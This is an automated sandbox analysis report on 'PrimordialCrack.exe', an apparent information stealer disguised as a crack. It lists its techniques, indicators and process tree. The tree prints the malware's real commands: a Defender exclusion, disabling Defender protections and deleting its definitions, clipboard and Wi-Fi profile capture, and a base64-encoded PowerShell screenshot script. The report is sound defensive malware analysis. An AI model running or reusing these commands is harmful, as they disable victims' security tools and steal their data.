801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793

Resubmissions

28-10-2024 19:00

241028-xnwrrsvfpn 10

28-10-2024 18:32

241028-w6smdsvcra 10

28-10-2024 18:30

241028-w5wbwsspdt 10

28-10-2024 17:56

241028-wh5l2svbpf 10

Analysis

max time kernel
143s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
28-10-2024 17:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PrimordialCrack.exe
Size

7.5MB
MD5

0738a5a832b62e68a740aa3401d332ef
SHA1

3f3b0acdc4cc580de58495ca3b5a2aa305362825
SHA256

801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793
SHA512

0f008f61aa87d1efb5c83f1bf701112565aee0b2991645e36e0e10d0aa415e9b8ed9972bf847cba90bfd2549d1233599b6c9adc174e354e181d267cbe51429ce
SSDEEP

196608:wct1WurErvI9pWjgaAnajMsK2CfQCS/OinHC1e:dt1WurEUWjJjYRoPhHYe

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2564	powershell.exe
2432	powershell.exe
2120	powershell.exe
1164	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
208	powershell.exe
2284	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
880	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
4300	PrimordialCrack.exe
4300	PrimordialCrack.exe
4300	PrimordialCrack.exe
4300	PrimordialCrack.exe
4300	PrimordialCrack.exe
4300	PrimordialCrack.exe
4300	PrimordialCrack.exe
4300	PrimordialCrack.exe
4300	PrimordialCrack.exe
4300	PrimordialCrack.exe
4300	PrimordialCrack.exe
4300	PrimordialCrack.exe
4300	PrimordialCrack.exe
4300	PrimordialCrack.exe
4300	PrimordialCrack.exe
4300	PrimordialCrack.exe
4300	PrimordialCrack.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
28	discord.com
29	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
26	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
2164	tasklist.exe
2792	tasklist.exe
1160	tasklist.exe

UPX packed file 59 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023c85-21.dat	upx
behavioral2/memory/4300-25-0x00007FFCCBBF0000-0x00007FFCCC2B5000-memory.dmp	upx
behavioral2/files/0x0007000000023c78-27.dat	upx
behavioral2/memory/4300-30-0x00007FFCDF600000-0x00007FFCDF625000-memory.dmp	upx
behavioral2/files/0x0007000000023c83-29.dat	upx
behavioral2/files/0x0007000000023c7f-47.dat	upx
behavioral2/memory/4300-48-0x00007FFCE0800000-0x00007FFCE080F000-memory.dmp	upx
behavioral2/files/0x0007000000023c7e-46.dat	upx
behavioral2/files/0x0007000000023c7d-45.dat	upx
behavioral2/files/0x0007000000023c7c-44.dat	upx
behavioral2/files/0x0007000000023c7b-43.dat	upx
behavioral2/files/0x0007000000023c7a-42.dat	upx
behavioral2/files/0x0007000000023c79-41.dat	upx
behavioral2/files/0x0007000000023c77-40.dat	upx
behavioral2/files/0x0007000000023c8a-39.dat	upx
behavioral2/files/0x0007000000023c89-38.dat	upx
behavioral2/files/0x0007000000023c88-37.dat	upx
behavioral2/files/0x0007000000023c84-34.dat	upx
behavioral2/files/0x0007000000023c82-33.dat	upx
behavioral2/memory/4300-54-0x00007FFCDB540000-0x00007FFCDB56D000-memory.dmp	upx
behavioral2/memory/4300-56-0x00007FFCDB780000-0x00007FFCDB79A000-memory.dmp	upx
behavioral2/memory/4300-58-0x00007FFCDB510000-0x00007FFCDB534000-memory.dmp	upx
behavioral2/memory/4300-60-0x00007FFCDAB50000-0x00007FFCDACCE000-memory.dmp	upx
behavioral2/memory/4300-64-0x00007FFCDC160000-0x00007FFCDC16D000-memory.dmp	upx
behavioral2/memory/4300-63-0x00007FFCDB370000-0x00007FFCDB389000-memory.dmp	upx
behavioral2/memory/4300-70-0x00007FFCDB330000-0x00007FFCDB363000-memory.dmp	upx
behavioral2/memory/4300-69-0x00007FFCCBBF0000-0x00007FFCCC2B5000-memory.dmp	upx
behavioral2/memory/4300-74-0x00007FFCDF600000-0x00007FFCDF625000-memory.dmp	upx
behavioral2/memory/4300-73-0x00007FFCCB6E0000-0x00007FFCCB7AD000-memory.dmp	upx
behavioral2/memory/4300-72-0x00007FFCCB1B0000-0x00007FFCCB6D9000-memory.dmp	upx
behavioral2/memory/4300-80-0x00007FFCCB090000-0x00007FFCCB1AB000-memory.dmp	upx
behavioral2/memory/4300-78-0x00007FFCDB8D0000-0x00007FFCDB8DD000-memory.dmp	upx
behavioral2/memory/4300-76-0x00007FFCDB310000-0x00007FFCDB324000-memory.dmp	upx
behavioral2/memory/4300-81-0x00007FFCDB780000-0x00007FFCDB79A000-memory.dmp	upx
behavioral2/memory/4300-85-0x00007FFCDB510000-0x00007FFCDB534000-memory.dmp	upx
behavioral2/memory/4300-168-0x00007FFCDAB50000-0x00007FFCDACCE000-memory.dmp	upx
behavioral2/memory/4300-242-0x00007FFCDC160000-0x00007FFCDC16D000-memory.dmp	upx
behavioral2/memory/4300-283-0x00007FFCDB330000-0x00007FFCDB363000-memory.dmp	upx
behavioral2/memory/4300-285-0x00007FFCCB1B0000-0x00007FFCCB6D9000-memory.dmp	upx
behavioral2/memory/4300-286-0x00007FFCCB6E0000-0x00007FFCCB7AD000-memory.dmp	upx
behavioral2/memory/4300-340-0x00007FFCCB090000-0x00007FFCCB1AB000-memory.dmp	upx
behavioral2/memory/4300-325-0x00007FFCCBBF0000-0x00007FFCCC2B5000-memory.dmp	upx
behavioral2/memory/4300-331-0x00007FFCDAB50000-0x00007FFCDACCE000-memory.dmp	upx
behavioral2/memory/4300-326-0x00007FFCDF600000-0x00007FFCDF625000-memory.dmp	upx
behavioral2/memory/4300-365-0x00007FFCDB330000-0x00007FFCDB363000-memory.dmp	upx
behavioral2/memory/4300-364-0x00007FFCDB370000-0x00007FFCDB389000-memory.dmp	upx
behavioral2/memory/4300-363-0x00007FFCDC160000-0x00007FFCDC16D000-memory.dmp	upx
behavioral2/memory/4300-362-0x00007FFCDAB50000-0x00007FFCDACCE000-memory.dmp	upx
behavioral2/memory/4300-361-0x00007FFCDB510000-0x00007FFCDB534000-memory.dmp	upx
behavioral2/memory/4300-360-0x00007FFCDB780000-0x00007FFCDB79A000-memory.dmp	upx
behavioral2/memory/4300-359-0x00007FFCDB540000-0x00007FFCDB56D000-memory.dmp	upx
behavioral2/memory/4300-358-0x00007FFCE0800000-0x00007FFCE080F000-memory.dmp	upx
behavioral2/memory/4300-357-0x00007FFCDF600000-0x00007FFCDF625000-memory.dmp	upx
behavioral2/memory/4300-356-0x00007FFCCB6E0000-0x00007FFCCB7AD000-memory.dmp	upx
behavioral2/memory/4300-355-0x00007FFCCB090000-0x00007FFCCB1AB000-memory.dmp	upx
behavioral2/memory/4300-354-0x00007FFCDB8D0000-0x00007FFCDB8DD000-memory.dmp	upx
behavioral2/memory/4300-353-0x00007FFCDB310000-0x00007FFCDB324000-memory.dmp	upx
behavioral2/memory/4300-352-0x00007FFCCB1B0000-0x00007FFCCB6D9000-memory.dmp	upx
behavioral2/memory/4300-341-0x00007FFCCBBF0000-0x00007FFCCC2B5000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
2312	cmd.exe
2288	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1816	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
5048	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 23 IoCs

pid	Process
1164	powershell.exe
2564	powershell.exe
2564	powershell.exe
2564	powershell.exe
1164	powershell.exe
1164	powershell.exe
208	powershell.exe
208	powershell.exe
4580	powershell.exe
4580	powershell.exe
208	powershell.exe
4580	powershell.exe
2432	powershell.exe
2432	powershell.exe
2432	powershell.exe
4508	powershell.exe
4508	powershell.exe
2120	powershell.exe
2120	powershell.exe
2120	powershell.exe
1060	powershell.exe
1060	powershell.exe
1060	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1164	powershell.exe
Token: SeDebugPrivilege	2564	powershell.exe
Token: SeDebugPrivilege	2792	tasklist.exe
Token: SeDebugPrivilege	2164	tasklist.exe
Token: SeDebugPrivilege	208	powershell.exe
Token: SeIncreaseQuotaPrivilege	2596	WMIC.exe
Token: SeSecurityPrivilege	2596	WMIC.exe
Token: SeTakeOwnershipPrivilege	2596	WMIC.exe
Token: SeLoadDriverPrivilege	2596	WMIC.exe
Token: SeSystemProfilePrivilege	2596	WMIC.exe
Token: SeSystemtimePrivilege	2596	WMIC.exe
Token: SeProfSingleProcessPrivilege	2596	WMIC.exe
Token: SeIncBasePriorityPrivilege	2596	WMIC.exe
Token: SeCreatePagefilePrivilege	2596	WMIC.exe
Token: SeBackupPrivilege	2596	WMIC.exe
Token: SeRestorePrivilege	2596	WMIC.exe
Token: SeShutdownPrivilege	2596	WMIC.exe
Token: SeDebugPrivilege	2596	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2596	WMIC.exe
Token: SeRemoteShutdownPrivilege	2596	WMIC.exe
Token: SeUndockPrivilege	2596	WMIC.exe
Token: SeManageVolumePrivilege	2596	WMIC.exe
Token: 33	2596	WMIC.exe
Token: 34	2596	WMIC.exe
Token: 35	2596	WMIC.exe
Token: 36	2596	WMIC.exe
Token: SeDebugPrivilege	1160	tasklist.exe
Token: SeDebugPrivilege	4580	powershell.exe
Token: SeIncreaseQuotaPrivilege	2596	WMIC.exe
Token: SeSecurityPrivilege	2596	WMIC.exe
Token: SeTakeOwnershipPrivilege	2596	WMIC.exe
Token: SeLoadDriverPrivilege	2596	WMIC.exe
Token: SeSystemProfilePrivilege	2596	WMIC.exe
Token: SeSystemtimePrivilege	2596	WMIC.exe
Token: SeProfSingleProcessPrivilege	2596	WMIC.exe
Token: SeIncBasePriorityPrivilege	2596	WMIC.exe
Token: SeCreatePagefilePrivilege	2596	WMIC.exe
Token: SeBackupPrivilege	2596	WMIC.exe
Token: SeRestorePrivilege	2596	WMIC.exe
Token: SeShutdownPrivilege	2596	WMIC.exe
Token: SeDebugPrivilege	2596	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2596	WMIC.exe
Token: SeRemoteShutdownPrivilege	2596	WMIC.exe
Token: SeUndockPrivilege	2596	WMIC.exe
Token: SeManageVolumePrivilege	2596	WMIC.exe
Token: 33	2596	WMIC.exe
Token: 34	2596	WMIC.exe
Token: 35	2596	WMIC.exe
Token: 36	2596	WMIC.exe
Token: SeDebugPrivilege	2432	powershell.exe
Token: SeDebugPrivilege	4508	powershell.exe
Token: SeIncreaseQuotaPrivilege	4644	WMIC.exe
Token: SeSecurityPrivilege	4644	WMIC.exe
Token: SeTakeOwnershipPrivilege	4644	WMIC.exe
Token: SeLoadDriverPrivilege	4644	WMIC.exe
Token: SeSystemProfilePrivilege	4644	WMIC.exe
Token: SeSystemtimePrivilege	4644	WMIC.exe
Token: SeProfSingleProcessPrivilege	4644	WMIC.exe
Token: SeIncBasePriorityPrivilege	4644	WMIC.exe
Token: SeCreatePagefilePrivilege	4644	WMIC.exe
Token: SeBackupPrivilege	4644	WMIC.exe
Token: SeRestorePrivilege	4644	WMIC.exe
Token: SeShutdownPrivilege	4644	WMIC.exe
Token: SeDebugPrivilege	4644	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4500 wrote to memory of 4300	4500	PrimordialCrack.exe	84
PID 4500 wrote to memory of 4300	4500	PrimordialCrack.exe	84
PID 4300 wrote to memory of 2528	4300	PrimordialCrack.exe	88
PID 4300 wrote to memory of 2528	4300	PrimordialCrack.exe	88
PID 4300 wrote to memory of 1516	4300	PrimordialCrack.exe	89
PID 4300 wrote to memory of 1516	4300	PrimordialCrack.exe	89
PID 1516 wrote to memory of 2564	1516	cmd.exe	92
PID 1516 wrote to memory of 2564	1516	cmd.exe	92
PID 2528 wrote to memory of 1164	2528	cmd.exe	93
PID 2528 wrote to memory of 1164	2528	cmd.exe	93
PID 4300 wrote to memory of 2412	4300	PrimordialCrack.exe	94
PID 4300 wrote to memory of 2412	4300	PrimordialCrack.exe	94
PID 4300 wrote to memory of 3084	4300	PrimordialCrack.exe	96
PID 4300 wrote to memory of 3084	4300	PrimordialCrack.exe	96
PID 2412 wrote to memory of 2164	2412	cmd.exe	98
PID 2412 wrote to memory of 2164	2412	cmd.exe	98
PID 4300 wrote to memory of 2284	4300	PrimordialCrack.exe	99
PID 4300 wrote to memory of 2284	4300	PrimordialCrack.exe	99
PID 3084 wrote to memory of 2792	3084	cmd.exe	100
PID 3084 wrote to memory of 2792	3084	cmd.exe	100
PID 4300 wrote to memory of 5060	4300	PrimordialCrack.exe	101
PID 4300 wrote to memory of 5060	4300	PrimordialCrack.exe	101
PID 4300 wrote to memory of 4852	4300	PrimordialCrack.exe	102
PID 4300 wrote to memory of 4852	4300	PrimordialCrack.exe	102
PID 4300 wrote to memory of 956	4300	PrimordialCrack.exe	104
PID 4300 wrote to memory of 956	4300	PrimordialCrack.exe	104
PID 4300 wrote to memory of 2312	4300	PrimordialCrack.exe	107
PID 4300 wrote to memory of 2312	4300	PrimordialCrack.exe	107
PID 4300 wrote to memory of 1308	4300	PrimordialCrack.exe	110
PID 4300 wrote to memory of 1308	4300	PrimordialCrack.exe	110
PID 4300 wrote to memory of 4612	4300	PrimordialCrack.exe	112
PID 4300 wrote to memory of 4612	4300	PrimordialCrack.exe	112
PID 2284 wrote to memory of 208	2284	cmd.exe	113
PID 2284 wrote to memory of 208	2284	cmd.exe	113
PID 5060 wrote to memory of 2596	5060	cmd.exe	139
PID 5060 wrote to memory of 2596	5060	cmd.exe	139
PID 956 wrote to memory of 1480	956	cmd.exe	116
PID 956 wrote to memory of 1480	956	cmd.exe	116
PID 4852 wrote to memory of 1160	4852	cmd.exe	117
PID 4852 wrote to memory of 1160	4852	cmd.exe	117
PID 2312 wrote to memory of 2288	2312	cmd.exe	141
PID 2312 wrote to memory of 2288	2312	cmd.exe	141
PID 4612 wrote to memory of 4580	4612	cmd.exe	120
PID 4612 wrote to memory of 4580	4612	cmd.exe	120
PID 1308 wrote to memory of 5048	1308	cmd.exe	121
PID 1308 wrote to memory of 5048	1308	cmd.exe	121
PID 4300 wrote to memory of 4972	4300	PrimordialCrack.exe	122
PID 4300 wrote to memory of 4972	4300	PrimordialCrack.exe	122
PID 4972 wrote to memory of 628	4972	cmd.exe	124
PID 4972 wrote to memory of 628	4972	cmd.exe	124
PID 4300 wrote to memory of 3428	4300	PrimordialCrack.exe	125
PID 4300 wrote to memory of 3428	4300	PrimordialCrack.exe	125
PID 3428 wrote to memory of 3232	3428	cmd.exe	127
PID 3428 wrote to memory of 3232	3428	cmd.exe	127
PID 4300 wrote to memory of 2680	4300	PrimordialCrack.exe	128
PID 4300 wrote to memory of 2680	4300	PrimordialCrack.exe	128
PID 4580 wrote to memory of 3852	4580	powershell.exe	130
PID 4580 wrote to memory of 3852	4580	powershell.exe	130
PID 4300 wrote to memory of 3804	4300	PrimordialCrack.exe	131
PID 4300 wrote to memory of 3804	4300	PrimordialCrack.exe	131
PID 2680 wrote to memory of 244	2680	cmd.exe	133
PID 2680 wrote to memory of 244	2680	cmd.exe	133
PID 3804 wrote to memory of 2432	3804	cmd.exe	134
PID 3804 wrote to memory of 2432	3804	cmd.exe	134

C:\Users\Admin\AppData\Local\Temp\PrimordialCrack.exe
"C:\Users\Admin\AppData\Local\Temp\PrimordialCrack.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4500
- C:\Users\Admin\AppData\Local\Temp\PrimordialCrack.exe
  "C:\Users\Admin\AppData\Local\Temp\PrimordialCrack.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\PrimordialCrack.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2528
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\PrimordialCrack.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1516
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2412
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3084
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:2284
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5060
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4852
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:956
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:2312
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:2288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1308
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:5048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4612
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
